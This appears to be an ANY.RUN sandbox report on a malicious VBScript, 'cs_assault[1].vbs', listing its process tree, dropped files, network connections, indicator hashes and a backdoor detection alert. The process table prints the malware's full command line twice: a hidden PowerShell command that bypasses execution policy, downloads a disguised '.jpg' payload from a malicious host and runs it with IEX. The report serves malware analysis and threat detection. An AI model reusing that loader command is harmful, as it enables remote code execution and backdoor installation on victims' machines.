File name: | cs_assault[1].vbs |
Full analysis: | https://app.any.run/tasks/add84a16-e8b2-4fbb-83e8-e7e9e534f892 |
Verdict: | Malicious activity |
Analysis date: | November 15, 2018, 21:45:52 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 4BF56EECA86FFA699B848DEC6CB2E009 |
SHA1: | 4FDC0444D2B6F2E2142160720CB5BD038BC83290 |
SHA256: | 60E7C0630C75AEC04671AE2371046481861B7C08FED520CBDBD6C815BD06B255 |
SSDEEP: | 24:+ZllMFeu5P4uHHi/6U+uU4q7xmWAWGW71:out5i/rOcW71 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
4080 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\cs_assault[1].vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3436 | "C:\Windows\System32\wscript.exe" "C:\Users\admin\AppData\Local\Temp\cs_assault[1].vbs" AdminArg | C:\Windows\System32\wscript.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
1220 | "C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('http://ghost246630.worldhosts.ru/csgo.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack | C:\Windows\System32\cmd.exe | — | wscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3216 | powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('http://ghost246630.worldhosts.ru/csgo.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3904 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A2L2R0PBDJ2S7H1NUFKR.temp | — | |
MD5:— | SHA256:— | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da6ab.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3216 | powershell.exe | GET | 200 | 5.196.149.90:80 | http://ghost246630.worldhosts.ru/csgo.jpg | FR | text | 46.0 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3216 | powershell.exe | 185.86.1.223:5551 | — | Everest Broadcasting Company Ltd | UA | malicious |
3216 | powershell.exe | 5.196.149.90:80 | ghost246630.worldhosts.ru | OVH SAS | FR | malicious |
— | — | 185.86.1.223:5551 | — | Everest Broadcasting Company Ltd | UA | malicious |
Domain | IP | Reputation |
---|---|---|
ghost246630.worldhosts.ru |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3216 | powershell.exe | A Network Trojan was detected | SC BACKDOOR backdoor receiving config via image file (02/18) |